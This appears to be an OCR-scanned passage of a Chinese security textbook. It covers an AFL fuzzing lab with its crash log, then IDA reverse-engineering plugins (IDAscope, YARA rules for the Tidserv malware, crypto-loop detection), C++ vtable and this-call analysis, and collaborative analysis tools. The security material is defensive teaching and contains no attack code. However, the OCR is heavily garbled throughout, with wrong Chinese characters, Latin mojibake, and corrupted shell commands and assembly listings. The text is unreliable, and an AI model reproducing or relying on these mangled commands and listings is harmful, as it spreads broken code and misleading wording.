now trying : splice 13 favored paths : B (106.0605) 
Stage execs : 252/256 (98.44%) new edges on : B (100. 00%) 
total execs : 1.44M total crashes : 1 (1 unique) 
exec speed : 4214/sec total tmouts : 8 (8 unique) 
fuzzing strategy yields phe geometry 
bit flips : n/a, n/a, n/a levels : 7 
byte flips : n/a, n/a, n/a pending : Q 
arithmetics : n/a, n/a, n/a pend fav : @ 
known ints : n/a, n/a, n/a own finds : 7 
dictionary : n/a, n/a, n/a imported : n/a 
havoc : B/959k, 0/475k stability : 100.00* 
trim : 17.95%/6, n/a -— | 
^C [(cpu060: 100%] 


图 3-1 AFL 包含 信息 丰富 的 接口 


HÆF, ROAM Aas 80 — Ab d 1t — — 这 是 我 们 预期 找到 的 对 误 。 很 不 错 ， 
AFL 在 短 短 5 分 钟 的 时 间 里 找到 了 最 里 面 的 代码 块 。 

与 Peach 类似 , AFL 提 供 崩 尝 日 志 , 可 从 日 志 中 得 找到 达 漏 洞 代 码 块 的 文件 输入 : 

rootGükali:-/afl-2.41b4 cat 

output/crashes/idN:000000N,s8igN:06N, rcN :000007N, op\:havoc\, rep\2 

abcdefghbcdeS 

与 预期 的 一 样 ， 分 析 字 符 串 abcdefgh 的 前 8 个 字 节 ， 并 到 达 内 部 代码 块 ， 在 那里 
2% ECH IE) -o 


实验 3-3: AFL 遗传 模糊 测试 


你 将 在 这 个 实验 中 构建 和 使 用 上 述 AFL， 步 又 如 下 : 

(1) 从 Kali Linux 2017(32 位 镜像 ，2GB RAM, 在 虚拟 机 中 分 配 两 个 内 核 ) 下 载 和 
构建 AFL: 

e wget lcamtuf.coredump.cx/afl/releases/afl-latest.tgz 

e tar -xzvi afl-latest.tgz 

e cdafl-2.41b/ 

e make 

(2) 复制 asdf3.c 文 件 ， 或 从 本 书 网 站 下 载 ， 将 其 保存 到 afl-2.41b/ 目 录 中 。 

(3) 使 用 AFL 检测 工具 进行 编译 : 


./afl-clang ./asdf3.c  -o asdf3 
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(4) 在 afl-2.41b/ 目 录 下 创建 input/ 目 录 。 
(5) 在 input 目 录 下 创建 fle.txt 文 件 ， 文 件 内 容 为 aaaaaaaa。 
(6) 在 af-2.41b/ 目 录 中 执行 以 下 代码 ， 局 动 AFL 模糊 测试 : 


./afl-fuzz -i input/ -o output -d ./asdf3 


(D) 在 GUI 中 检测 崩溃 ， 然 后 分 析 上 述 骨 溃 日 志 . 
3.6 KE 


简单 且 易 于 设置 的 特点 使 得 模糊 测试 成 为 一 种 流行 的 测试 方法 。 今 天 的 模糊 测 
试 框 染 (如 Peach 等 ) 建 立 在 随机 测试 的 未 昌 上 ， 它 们 好 过 跟踪 模糊 测试 社区 的 最 新 进 
展 而 人 不断 友 展 。AFL 将 模糊 测试 所 升 到 了 一 个 新 水 平 ， 使 用 遗传 算法 达到 最 住 的 代 
人 码 敌 兰 范围 。 为 有 效 地 使 用 这 些 新 工具 ， 一 定 要 使 用 并 理解 这 些 工具 。 本 章 提 供 的 
必要 语言 和 对 模糊 测试 世界 的 概述 ， 虽 在 帮助 读者 开展 测试 并 寻找 漏洞 。 
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在 像 逸 癌 工 程 这 样 以 解决 问题 为 目标 的 活动 中 ， 并 不 存在 所 谓 善 意 或 恶意 的 做 
法 。 通 币 情 况 下 ， 不 论 是 哪 种 做 法 ， 都 是 为 了 完成 下 面 的 各 种 目的 而 提取 所 需 的 


HE: 

e 开展 软件 的 安全 审计 

e fs. Mr Guess B E 

e AHERN, UBER T 

在 从 事 这 些 活动 的 过 程 中 ， 逆 同 工 程 师 可 能 对 目 己 目前 使 用 的 工作 流 和 工具 感 
EIE aed 从 而 错过 该 领域 最 新 的 扩 术 及 展 步 伐 ， 无 法 获得 新 工具 市 来 的 好 处 。 

本 章 旨 在 介绍 一 些 较 新 的 工具 和 分 析 技 术 ， 用 以 帮助 直 德 黑客 们 极 大 地 改善 明 
用 — 这 些 工具 和 技术 主要 用 于 重点 分 析 恶 意 软件 并 研究 漏洞 ， 但 
这 些 知 识 都 可 以 用 于 逆 癌 工程 任务 。 


本 章 涵 震 的 主题 如 下 : 

e 代码 标注 (Code Annotation) 
e 协作 化 分 析 

e 动态 分 析 


4.1 代码 标注 


讨论 逆 回 工程 就 必定 会 担 及 IDAUWmnteractive Disassembler)。 A T PB IE APT 
法 ， 使 用 更 好 的 IDBGDA database files，IDA 数 据 库 文 件 ) 反 汇编 标注 ， 以 提升 IDA 功 
能 和 可 用 性 。 这 些 扩 展 项 是 DA 用户 为 了 改进 他 们 的 工作 法 和 元 服 在 分 析 过 程 中 过 
到 的 各 种 困难 而 开发 的 。 因 此 ， 可 作为 用 户 在 研究 恶意 软件 或 漏洞 时 所 遇 到 的 常见 
问题 及 其 解决 方案 的 极 佳 范 例 。 


41.1 使 用 IDAscope 的 IDB 标 注 

IDAscope 是 一 个 有 趣 的 开源 插件 ， 由 Daniel Plohmann 和 Alexander Hanel 共 同 开 
发 ， 在 2012 年 度 Hex-Rays 插 件 大 赛 中 荣获 亚军 。IDAscope 主 要 面 同 Windows 平 台 上 
可 执行 文件 的 逆 辐 分析， 但 具有 可 扩展 的 结构 ， 从 而 易于 修改 和 添加 功能 。 下 面 列 
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举 该 插件 提供 的 一 些 功 能 。 
e 生命 名 和 标注 函数 
将 代码 块 转换 为 函数 
识别 加 密 函 数 
将 Windows API 文 档 导 入 IDA 
语义 代码 看 色 
要 安装 该 插件 ， 可 从 https://bitbucket.org/daniel plohmann/simplifire.idascope 下 载 
代码 。 从 IDA 中 运行 IDAscope.py 脚 本 即 可 启动 该 插件 。 如 果 插 件 初 始 化 成 功 ，IDA 
的 输出 窗口 中 将 出 现下 列 信息 : 


[1] IDAscope.py is not present in root directory specified in 
"config.py", trying to resolve path... 
[+] IDAscope root directory successfully resolved. 


TETTE TEE TEE EE AE AE AE HE AE E TE EE TE TEE AE AE FE AE TEE TE TEE AE AE E FE TETTE EE AE FE HE TEE 


LI NAN 

PTE tL LIZ AL Is ANNA 
| lil / WV CE ©) _/ 
NEN // NN INN A /\ | 


LIAR LALA LLLLLLLALLLALLLLLL EC LALLLLLLLLLALLLLA 
by Daniel Plohmann and Alexander Hanel 
FE AE HE E HE AE AE ETE E AE AE ETE E AE AE TE IEEE a EE AE AE EE 


[+] Loading simpliFiRE.IDAscope 
[/] setting up shared modules... 
[|] loading DocumentationHelper 
[|] loading SemanticIdentifier 


[\] this took 0.08 seconds. 


图 4-1 显 示 了 IDA 中 的 IDAscope 用 户 界 面 。 该 插件 提供 了 一 套 完 整 的 功能 来 帮助 
进行 初步 的 文件 分 析 。 下 面 是 使 用 该 插件 分 析 新 样本 时 的 典型 工作 流 。 

(1) 将 所 有 未 知 代 码 作 为 函数 进行 修复 。 使 用 几 种 启发 式 算法 将 那些 在 IDA 中 无 
法 被 正确 识别 为 函数 的 数据 和 代码 转换 为 正确 的 IDA 函 数 。 

本 阶段 将 首先 “修复 那些 常用 函数 首部 (Function Prolog) 的 未 知 代码 ”( 如 插件 文 
档 中 所 述 )。 这 样 可 确保 在 第 一 阶段 , 只 有 那些 具有 明显 标志 的 代码 可 被 转换 成 图 数 。 
这 种 情况 下 ， 标 准 的 图 数 首部 (push ebp; mov ebp, esp 或 55 8B EC) 被 作为 局 发 因子 
使 用 。 之 后 ， 该 插件 会 答 试 将 其 他 所 有 指令 转换 为 函数 代码 。 

(2) 重 命 名 潜在 的 函数 包装 器 ,这 是 获得 免费 且 局 质量 的 DB 标注 的 一 种 便捷 方 
式 。 疯 数 包装 占 通 常 是 一 个 简单 函数 ， 用 于 为 男 一 个 函数 (例如 ， 一 个 APD 实 现 错 误 
检 枉 代码 之 类 操作 。 在 这 样 的 背 景 下 ， 函 数 包装 颖 只 能 调用 男 一 个 函数 ， 因 此 很 容 
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易 根 据 函 数 包 沪 右 有 的 名 称 来 确定 它 所 包装 的 函数 。 函 数 包 沪 占 使 用 以 下 命名 模板 : 
WrappingApiName + _W( 例 如 ，CreateProcessA w). 

(3) 根据 识别 出 的 标签 对 函数 进行 重 命 名 。 这 是 一 种 可 喧 普 加 快 逆 回 工程 过 程 
的 超 酪 方法 。 衣 方法 将 API 函 数 分 组 并 添加 组 名 作为 亢 数 名 的 前 缀 。 例 如 ， 调 用 了 
CryptBinaryToStringA 的 函数 sub 10002590 会 被 重 命名 为 Crypt sub 10002590。 如 果 
一 个 了 冰 数 调用 了 多 个 组 中 的 API"， 那 么 其 前 级 名 束 由 所 有 这 些 组 名 构成 (例如 ， 
Crypt File Reg sub 10002630). 

(4) REEE. AGT Bok MT Va AA Y Tig X 2H AA PIR BBE PE ASR AT AG 
色 。 不 同 的 色彩 代表 不 同 的 API 组 ， 根 据 颜 色 可 更 容易 地 定位 需要 关注 的 基本 块 。 
当面 对 函数 调用 概况 图 以 了 解 不 同 的 函数 是 如 何 相互 调用 时 ， 这 种 看 色 方 法 在 较 大 
的 概况 图 中 尤其 方便 。 


a Function Inspection | ÉL] WinAPI Browsing | É Crypto Identification | 48» YARA Scanner 


Functions: 51 - Tagged: 8 - Displayed: 7 


Address | Name ind | Crypt File Mutx Proc Reg Str WIMet Wa ^ 

1 010002630 Crypt File Reg sub 10002630 6 1 0 0 
2 01000130 Crypt sub 100013E0 1 0 
3 0x10002590 Crypt sub 10002590 3 0 
4 010005520 DilEntryPoint 0 0 
0 0 


0 
0 
0 
0 
5 Ux10001018 strncpy 1 


1 
0 0 0 
0 0 0 
1 0 0 
0 0 0 


- 


Selected function contains the following API references with parameters: 


Address API Tag | Address Type Name Value 


1 md0003363 Cryptbinary ToString& | Crypt |1 010003350 DWORD . *pcchStrng hd 
2 0x10003331 CryptBinaryToStringA Crypt E 0x1000335a DWORD cbBinary 06 
3 Ux100033c0 CryptBinaryloStringA Crypt |3 010003358 DWORD dwFlags bs 
4 0x10003316 CryptBinaryToStringA Crypt | |4 0x10003357 LPSTR pszString — 0x0 


5 Ox10002625 SHDeleteKeyW Reg — ||5 010003362 const BYTE “pbBinary 0x2 
6 0x10003443 CryptStringToBinaryA Crypt 
7 0x1000338f CryptBinaryToStringA Crypt 
8 Ox100026b0 DeleteFileW File 


图 4-1 IDAscope 插 件 的 用 户 界 面 


此 时 ，IDB 中 应 已 充斥 各 种 来 自 IDAscope 插 件 的 标注 ， 现 在 样本 分 析 工 作 可 以 
开始 了 。 

EtA} Windows F A HITA e LFE, 和 常会 人 过 到 不 熟悉 的 API 函 数 名 。 此 关 情 况 
下 ， 最 第 见 的 方法 就 是 但 看 做 软 开发 者 网 络 (Microsoft Developer Network, MSDN) 
上 的 相关 摘 述 。 可 在 IDA 的 IDAscope 用 户 界 面 的 WinAPI Browsing 选 项 卡 中 直接 搜索 
MSDN 函 数 摘 述 页 面 (多 4-2 旺 示 了 一 个 示例 )。 这 些 网 页 有 两 种 访问 模式 : 在 线 和 离 
线 。 在 线 模式 需要 连接 互联 网 ， 用 以 查找 API 信 息 。 要 离线 使 用 ， 需 要 下 载 API 文 档 
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对 应 的 档案 文件 并 解压 到 默认 路 径 C:\WinAPI 下 ， 之 后 便 可 直接 从 本 地 文档 中 查阅 
而 不 必 连 接 到 互联 网 去 搜索 。 


Q WinAPI — | a Crypto Identification 
*m +| CreateProcessA (QJ 


CreateProcess Function 


as 
=- 
一 - 
= 


Creates anew process and its primary thread, The new process runs in the security context of 
the calling process. 


If the calling process is impersonating another user, the new process uses the token for the 
calling process, not the impersonation token. To run the new process in the security context of 
the user represented by the impersonation token, use the CreateProcessAsUser or 
CreateProcessWithLogonW function. 


Syntax 


BOOL WINAPI CreateProcess | 

in opt LPCISIR lpépplicationNamae, 

. inout opt  LPISIR l!pCommandLine, 

..in opt LPSECURITY_ATIRIBUTES lpProcessAttributes, 
in opt LPSECURITY ATTRIBUTES lpThreadAttributes, 
in BOOL bInheritHandles, 
in DWORD dwCrestionFlags, 
in opt LPVOID lpEnvironment, 
in opt LPCISIR l!pCurrentDirectory, 
in LPSTARTUPINFO lpStartupInfo, 
out LPPROCESS INFORMATION lpPrecessiInformation 


d 


图 4-2 IDAscope 用 户 界 面 的 WinAPI Browsing 选 项 卡 


针对 恶意 软件 的 刘 同 工程 通 弟 包括 正确 识别 和 分 类 恶意 软件 家 族 谐 系 等 工作 。 
YARA 可 能 是 开源 世界 最 流行 和 最 知名 的 用 于 编写 恶意 软件 釜 名 的 工具 .YARA 文 持 
使 用 通配符 甚 全 更 复杂 的 正则 表达 陈 来 编写 和 丛 名 信息 。 另 外 ，YARA 使 用 文 持 的 文 
件 格式 模块 。 

随 看 越 来 越 多 的 研究 人 员 和 安全 情报 在 报告 中 使 用 YARA 答 名， 直接 在 IDA 中 
对 其 进行 检 枉 就 会 很 方便 。IDAscope 可 对 加 载 的 样本 检查 所 有 可 用 的 YARA 签 名 ， 
并 输出 包含 每 个 签名 在 样本 中 匹配 次 数 及 具体 位 置 这 些 信息 的 表格 。 以 下 是 一 个 简 
单 的 YARA 签 名 文件 ， 用 来 检 栓 名 为 Tidserv 的 恶意 软件 样本 : 


rule Tidserv cmd32 { 


meta: 
author = "GrayHat" 
description = "Tidserv CMD32 component strings." 


reference = "OE288102B9F6C/892F5C3AA3EB/A1B52" 
strings: 
sml = "JKgxdd5ff44o0kghk75ggp43423ksf89034jklsdfjklas89023" 
Sm2 = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) 
GeckaSeka/20090911 Firefox/3.5.1" 
condition: 
any of them 
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} 


rule Tidserv generic { 
meta: 
author = "GrayHat" 
description - "Tidserv config file strings. 
reference = "OE288102B9F6C7892F5C3AA3EB7A1B52" 
strings: 
$ml = "[kit hash begin]" 
$m2 — "[cmd dll hash begin]" 
$m3 — "[SCRIPT SIGNATURE CHECK]" 
condition: 
any of them 
} 


Tidserv 样 本 QMD5: 0E288102B9F6C7892F5C3AA3EB7A1B52) 的 检查 结果 如 图 4-3 
所 示 。 其 中 显示 Tidserv generic 和 Tidserv_cmd32 这 两 个 YARA 规 则 中 所 有 的 字符 串 签 
名 都 存在 思 配 。 可 根据 该 图 ， 通 过 检查 匹配 发 生 的 地 址 来 分 析 和 检查 可 能 存在 的 假 


阳 HE 


ain 


mA— _ Stings Matched % Matched Match? 


lidserv_generic 


3 out of 3 strings matched (Tidserv_generic) 


Address / Type String ID Value 


图 4-3 IDAscope 中 的 YARA 扫 描 结 果 输 出 表格 


E. YARA 签 名 是 一 种 记录 恶意 软件 分 析 并 建立 个 人 签名 库 的 好 方式 。 
签名 可 用 于 搜集 恶意 软件 ， 威 胁 情 报 (Threat Intelligence) 也 可 用 这 些 签 
名 pite iid 团 KAHE BATS GEET 


作为 探索 该 插件 功能 的 最 后 一 步 ， 我 们 将 使 用 YARA 来 识别 加 密 函 数 。 识 别 加 


EB 
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密 函 数 的 第 一 种 (也 是 最 常见 的 ) 方 式 是 识别 各 种 加 密 常量 ,还 有 很 多 其 他 的 IDA 插 件 
和 调试 右 也 实现 了 这 个 功能 , 如 FindCrypt、 FindCrypt2、KANAL for PeID、 SnD Crypto 
Scanner、CTryptoSearcher 等 。 除 了 这 种 标准 方法 ，IDAscope 还 实现 了 一 个 基于 代码 
中 的 循环 来 检 剖 加密 函数 的 静态 月 友 式 算法 。 该 算法 包括 三 个 可 配置 的 参数 : 

e ArithLog 等 级 (ArithLog Rating) 这 些 界定 值 用 来 定义 一 个 基本 块 中 鼻 术 
指令 所 占 的 最 小 和 最 大 和 百分比。 循环 体 内 含有 高 百分比 的 算术 指令 是 加 密 、 
解密 或 哈 硕 相关 图 数 的 一 个 很 好 的 存在 指标 。 

e 基本 块 的 长 度 (Basic Blocks Size) 定义 了 一 个 基本 块 所 能 含有 的 指令 数目 
的 最 小 值 和 最 大 值 。 由 于 加 密 和 哈 硕 算法 经 名 使 用 展开 循环 (Unroll Loops ), 
因此 可 将 较 大 的 基本 块 视 为 加 密 算 法 的 指标 。 

e 人 允许 的 调用 次 数 (Allowed Calls) ”规定 了 一 个 基本 块 右 与 加 密 相 关 ， 所 能 志 
行 的 API 调 用 次 数 的 最 小 值 和 最 大 值 。 调 用 次 数 较 少 ， 则 更 能 证 实 是 加 蜜 函 
数 ; 原因 是 大 多 数 加 蜜 函 数 都 是 独立 的 ， 以 便 提 高 性 能 。 

推荐 最 佳 参数 配置 非常 困难 ， 因 为 在 很 大 程度 上 这 取 雇 于 样本 中 加 密 的 具体 实 

现 。 最 好 的 办 法 是 以 迭 代 方 式 修 改 参数 并 检查 结 采 。 如 采 示 个 特定 的 参数 配置 不 能 
产生 令 人 酒 意 的 结果 ， 那 么 对 于 需要 减少 输出 结果 的 情况 就 降低 边界 值 ， 反 之 则 
扩大 输出 结 末 的 范围 (结果 中 将 含有 干扰 项 噪声 )。 

图 4-4 显 示 了 一 组 配置 参数 的 实例 ， 用 于 检索 在 RC4 算 法 之 前 通过 异 或 XKOR) 来 

解密 密 钥 的 可 能 位 置 。 


| af Function Inspection | LL winapi Browsing | 吕 Crypto Identification €» YARA Sci < |P] 
E)g' V 
Arithmetic/Logic Heuristic 


ArithLog Rating: 30 m " m VY) Exdude Zeroing 
Any Loops 
Basic Blocks size: 5 " " 50 = 
| Trivial Loops 
Allowed calls: 0 lal tal 10 | Group by Functions 


6 blocks from a total of 919 blocks matched with the above settings. 


| Address Name Block Address Instr Arithmetic/Logic Rating ^ 
1 010002630 _Main__m Ox100026c0 6 50.00 

7 0x10002630 — Main m 0x10002660 ! 5000 = 

|3 0x10002630 — Main m 0x10002700 50.00 | 3 

l4 0x10002630 ^ Main m 0x10002720 50.00 

s Ox10001100 sub 10001100 0x10001107 60.00 . 


Found Crypto Signatures 


图 4-4 IDAscopeR'] JI 25 PIAL UU] TA RE 
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根据 得 出 结 采 中 的 地 址 检查 相关 代码 ， 可 证 实 开 或 解密 操作 。 以 下 是 IDAscope 
得 出 结果 中 前 两 个 基本 块 对 应 的 程序 清单 : 


.text:100026C0 
.Lext:100076C0 xor loop 1: 
.Lext:100026C0 mov CL. al 


.Lext:100026C2 Qada cl, all 
-Lext:100026C5 xor byte 10007000[eax], cl 


.Lext:100026CB add eax, 1 
.Ltext:100026CE cmp eax, l00h 
.text:100026D3 jb short xor loop 1 
.text:100026E0 

-text:100026E0 xor loop 2: 
.Lext:100026E0 mov Gl. al 


.text:100026E2 &)aad dl, J1h 
-Lext: 100026E5 Ozor byte 10007100 [eax], dl 


.text:100026EB add eax, 1 
.text:100026EEK cmp eax, 100h 
.text:100026F3 jb short xor 1 


@ 和 @ 处 的 指令 对 异 或 密 钥 进 行 显 式 赋值 (其 值 为 0x51), @ 和 @ 处 的 指令 则 用 前 
面 计算 出 的 异 或 密 钥 来 解密 获取 真正 的 RC4 密 钥 。 这 两 个 循环 使 用 相同 风格 的 算法 
来 解密 不 同 的 内 存 区 域 ， 它 们 是 识别 目 定 义 加 密 算 法 的 展 好 范例 一 一 基于 加 密 常 数 
匹配 的 传统 方法 往往 对 此 无 能 为 力 。 

熟悉 IDAscope 及 其 功能 定 能 获得 很 好 的 回报 ， 可 以 提升 使 用 [DA 进行 逆向 工程 
的 速度 和 效率 。 


4.1.2 ”C++ 代码 分 析 

C++ 是 一 门 相 比 C 更 复杂 的 语言 ，C++ 提 供 了 成 员 函 数 、 多 态 及 其 他 一 些 特性 。 
当 这 两 项 特性 (成 员 函 数 和 多 态 ) 被 使 用 时 , 它们 所 要 求 的 实现 细节 使 得 已 编译 的 C++ 
代码 看 上 去 与 已 编译 的 C 代 码 会 有 很 大 的 不 同 。 

1. 已 编译 的 C++ 代码 的 怪异 之 处 

首先 ， 所 有 非 静 态 成 员 函 数 都 有 一 个 this 指 针 ; 其 次 ， 多 态 是 通过 使 用 vtable( 虚 
PRAT ZS) HE SLIMY 


of 注意 ; 在 C++ 中 ，this 指 针 可 在 所 有 非 静态 成 员 函 数 中 使 用 ， 它 指向 成 员 函 
\S O 数 被 调用 时 所 在 的 对 象 ， 这 样 一 个 函数 就 可 在 许多 不 同 对 象 上 操作 ， 只 需 
要 在 每 次 调用 该 函数 时 为 this 指 针 提供 不 同 的 值 即 可 . 


ARAM EASA], 将 this 指 针 传 给 成 员 函 数 的 方式 也 有 所 不 同 。 微 软 编 诺 船 可 
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获取 调用 对 象 的 地 址 并 在 调用 成 员 函 数 之 前 将 其 放 入 ecxrcx 寄 人 存 散 。 微 软 将 这 种 调 
用 惯例 称 为 this 调 用 。 其 他 编译 器 (如 Borland 和 g++) 将 调用 对 象 的 地 址 作为 传 给 成 员 
函数 的 第 一 个 (最 堪 按 的 ) 参 数 ， 实 际 上 使 得 该 地 址 成 为 所 有 非 静 态 成 员 函 数 中 隐 侣 
的 第 一 个 参数 。 由 于 使 用 this 调 用 的 毕 故 ， 使 用 微软 编译 织 编 译 的 C++ 程 序 非 第 容易 
识别 。 下 面 给 出 一 个 简单 示例 。 


demo proc near 
this — dword ptr -4 
val = dword ptr 8 
push ebp 
mov ebp, esp 
push ecx 
mov [ebprthis], ecx ; save this into a local variable 
mov eax, [ebptthis] 
mov ecx, [ebptval] 
mov [eax], ecx 
mov edx, [ebptthis] 
mov eax, [edx] 
mov esp, ebp 
pop ebp 
retn 4 
demo endp 
; int cdecl main(int argc,const char **argv,const char *envp) 
main proc near 
x = dword ptr -8 
= = byte ptr -4 
argc = dword ptr 8 
argv = dword ptr OCh 
envp = dword ptr 10h 
push ebp 
mov ebp, esp 
sub esp, 8 
push 3 
lea ecx, [Lebpte] ; address of e loaded into ecx 
call demo ; demo must be a member function 
mov [ebp*x], eax 
mov esp, ebp 
pop ebp 
retn 
main  endp 


因为 Borland 和 8g++ 将 this 作 为 普通 栈 参 数 进行 传递 , 所 以 它们 的 代码 往往 看 上 去 
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更 像 传统 的 已 编译 的 C 代 码 ， 而 并 不 能 像 已 编译 的 C++ 代码 那样 被 立即 识别 出 来 。 
2. C++ 虚 函 数 表 


虚 录 数 表 (vtable) 是 C++ 中 虚 函 数 和 多 态 所 使 用 的 确 层 机 制 。 对 于 每 个 包含 虚 成 
员 函 数 的 类 ，C++ 编 译 占 都 会 生成 一 个 称 为 vtable 的 指针 表 。 类 中 的 每 个 虚 函 数 均 在 
vtable 中 对 应 一 项 , 编译 右 使 用 每 个 虚 函 数 的 具体 实现 的 指针 来 填 元 虚 表 项 。 28 ni FF 
将 所 有 被 覆盖 的 函数 的 指针 茶 换 成 对 应 的 子 类 实现 的 指针 。 下 例 展 示 了 超 类 和 子 类 
的 虚 函 数 表 : 


SuperVtable dd offset funcl ; DATA XREF: Super::Super (void) 


dd offset func2 
dd offset func3 
dd offset func4 
dd offset funco 
dd offset funcoó 


SubVtable dd offset funcl ; DATA XREF: Sub::Sub(void) 


可 以 看 出 ， 子 类 覆盖 了 func3 和 func4， 但 也 从 超 类 人 


dd offset func2 

dd offset sub 4010A8 
dd offset sub 4010C4 
dd offset func’ 

dd offset f 


unco 


数 表 的 以 下 特性 使 得 其 在 反 汇 编程 序 清单 中 很 显眼 : 


Q3 


虚 函 数 表 通 常 位 于 二 进 制 代码 的 只 读数 据 部 分 。 

RAI RIPE BAT A ER SU. zz Ee 2] FH BE PRIA o 

通过 检查 虚 函 数 表 之 间 的 相似 性 ， 有 可 能 了 解 C++ 程 序 中 各 类 之 间 的 继承 
如 果 示 个 类 包 侣 虚 函 数 ， 该 关 的 所 有 实例 都 将 包 侣 一 个 指 同 虚 函数 表 的 指 
针 ， 作 为 对 象 内 的 第 一 个 字段 。 这 个 指针 在 拓 的 构造 函数 中 被 初始 化 。 
调用 虚 函 数 的 过 程 分 为 3 步 。 首 先 ， 需 要 从 对 象 中 谈 取 虚 函 数 表 指针 。 其 次 ， 
需要 从 虚 函 数 表 中 读 取 对 应 的 虚 函 数 指针 。 最后， 如 过 检索 a 到 的 指针 调用 虚 


. PythonClassInformer 


运行 时 类 型 信息 (Runtime Type Information，RTTID 是 一 种 C++ 机 制 ， 它 公开 运行 
时 天 于 对 象 数 据 类 型 的 信息 。 仪 为 多 态 类 ( 即 包 含 虚 函 数 的 类 ) 生 成 RTTI。 对 C++ 代 
码 执行 逆向 工程 时 ，RTTI 提 供 关 于 类 名 、 继 承 和 类 布局 的 有 价值 的 元 数据 信息 。 遗 
憾 的 是 ，IDA 默 认 情 况 下 不 分 析 该 对 象 ， 不过， 可 通过 几 个 插件 ， 使 用 必需 的 元 数 
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据 来 标注 DB， 并 但 看 类 继承 层次 。 

PythonClassInformer 退 过 在 DA 中 提供 类 层次 结构 图 ， 人 完善 了 IDA 插 件 (比如 
ClassInformer) 的 传统 RTTI 分 析 功 能 。 类 层次 结构 的 可 视 化 有 助 于 了 解 多 个 类 的 关 
系 ， 在 处 理 复 杂 的 C++ 代码 时 尤其 如 此 。 

要 在 IDB 上 应 用 PythonClassInformer RTTI 标 注 ， 可 选择 File | Script File 或 按 下 
Alt+F7 组 合 键 来 运行 classinformer.py 文 件 。 一 旦 分 析 完 成 ， 与 图 4-5 类 似 的 窗口 将 显 
示 已 恢复 的 类 (如 果 文 件 包 含 RTTI 信 息 的 话 )。 


Class Diagram 


AbstractQueue Abstractautorun 


ResultQueug [TaskQueue| [ScreenSaverAutorun| |Shell&utorun| Link&utorun| |TaskScheduler26Autorun 


103.42% (846,-45) (309,7)  -1.0 


图 4-5 ”PythonClassInformer 类 图 对 象 层 次 结构 的 示例 
4. HexRaysCodeXplorer 


HexRaysCodeXplorer 是 显示 在 IDA 的 Hex-Rays 反 编译 右上 构建 插件 能 力 的 站 批 
插件 之 一 。Hex-Rays 抽 象 语 法 树 (Abstract Syntax Tree，AST) 被 称 为 ctree， 它 为 开 友 
人 员 提 供 了 结构 ， 用 于 操纵 反 编译 右 输 出 ， 以 及 在 这 些 数 据 上 执行 其 他 修改 (例如 ， 
反 混 消 或 类 型 分 析 )。 
HexRaysCodeXplorer 在 Hex-Rays 上 实现 以 下 功能 : 
e 显示 ctree 图 ”为 当前 反 编 诺 的 函数 显示 ctree 图 。 
e Object Explorer 视 图 与 PythonClassInformer 类 似 ， 该 视图 将 分 析 RTTI 信 
轧 ， 并 列 出 所 有 已 识别 的 虑 函数 表 及 其 名 称 和 方法 数 。 但 与 
PythonClassInformer 不 同 ， 它 不 会 对 反 汇 编 视 图 中 的 虚 函 数 表 命名 。 通 过 
Object Explorer 视 图 显示 的 一 个 有 用 功能 是 Make VTBL struct， 它 会 目 动 创 
EDAH, HAFIR M A E RRR RMA o 
e 将 类 型 提取 到 文件 中 将 所 有 关 型 信息 保存 到 当前 IDB 目 录 的 types.txt 文 
件 中 。 

e 将 ctree 提 取 到 文件 中 在 文本 文件 中 保存 ctree。 

e 跳 转 到 反 汇 编 视图 这 项 功能 十 分 有 趣 , 未 在 Hex-Rays 中 直接 提供 ; 它 允 许 
从 代码 的 相关 反 编 详 行 ， 浏览 到 反 汇 编 视图 中 的 汇编 指令 。 但 要 注意 ， 这 不 
是 一 对 一 映射 ， 因 为 通常 而 言 ， 单 个 C 反 编译 行 会 与 多 个 汇编 指令 相关 。 
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协作 分 析 


逆 问 工程 中 ， 协 作 和 信息 文档 是 非常 值得 关注 但 多 少 容易 被 忽视 的 话题 。 在 对 
复 林 的 恶意 软件 样本 或 软件 进行 池 同 工程 时 经 第 出 现 “ 多 人 同时 查看 ”的 情况 。 多 
年 来 的 很 多 尝试 以 及 不 同方 法 的 运用 已 经 可 以 实现 有 效 的 协作 工作 流 。 以 下 便 是 用 
于 实现 IDA 协 作 的 插件 及 其 大 事 记 : 


IDA Sync 由 Pedram Amini 开 发 的 基于 客户 端 /服务 器 以 构 的 一 种 插件 。 每 
个 客户 疹 都 连接 到 一 个 服务 左 ， 使 用 该 插件 中 注册 的 特殊 热 键 完 成 的 所 有 
IDB 改 动 会 立即 传送 到 其 他 客户 闫 。 服 务 左 上 保存 的 一 个 包含 全 部 改动 的 副 
本 可 被 新 客户 使 用 。 此 插件 已 不 再 积极 开发 ， 最 后 一 次 更 新 是 在 2012 年 。 
CollabREate 由 Chris Eagle 和 Tim Vidas 开 发 的 插件 ， 提 供与 IDA Sync 类 似 
的 功能 ,但 改进 了 对 多 个 客户 奖 间 不 同 操作 的 监视 和 分 吾 的 文 持 。 其 工作 尺 
理 关 似 于 软件 版 本 控制 系统 ， 因 为 它 允 许 用 户 上 传 和 下 载 对 IDB 的 改动 ， 也 
可 将 IDB 标 记 复 制 到 新 项 目 中 。 

BinCrowd 由 Zynamics 开 发 的 插件 ， 及 用 一 种 不 同方 式 来 实现 协作 。 与 前 
两 个 插件 不 同 ，Bincrowd 并 非 针 对 同一 IDB 的 活动 式 协 作 。 相 反 ， 它 创建 了 
一 个 市 标注 功能 的 数据 库 ， 可 在 共 孚 了 一 些 函 数 的 多 个 不 同样 本 间 重 复 使 
用 。 它 使 用 模糊 匹配 来 伍 找 相似 的 函数 ， 并 在 IDB 中 重 命 名 匹配 的 函数 。 
洛 户 总 工 具 作 为 开源 插件 发 布 ， 但 服务 器 组 件 始 终 没 有 公布 并 已 集 止 开 友 。 
IDA Toolbag [Aaron Portnoy, Brandon Edwards 和 Kelly Lum 联 合 开 发 的 一 
款 插 件 。 它 只 提供 有 限 的 协作 功能 ， 而 且 以 能 共享 使 用 该 插件 制作 的 标注 为 
主要 目标 。 访 插件 已 不 再 积极 开 友 。 

CrowdRE 由 CrowdStrike 开 友 的 一 秋 插 件 ， 实 际 上 是 重生 的 BinCrowd。 与 
上 述 几 率 插 件 不 同 ， 这 计 插 件 从 未 公开 过 源 代 码 。 它 与 提供 了 函数 匹配 服务 
的 CrowdStrike 服 务 需 相 捆绑 。 这 种 基于 服务 的 方法 可 能 无 法 吸引 那些 不 愿意 
品 第 三 方 分 至 样本 或 DB 信息 的 研究 人 员 。 因 此 在 使 用 该 插件 前 ， 建 议 阅 读 
其 最 终 用 户 许 可 协议 (End User Licence Agreement, EULA). 

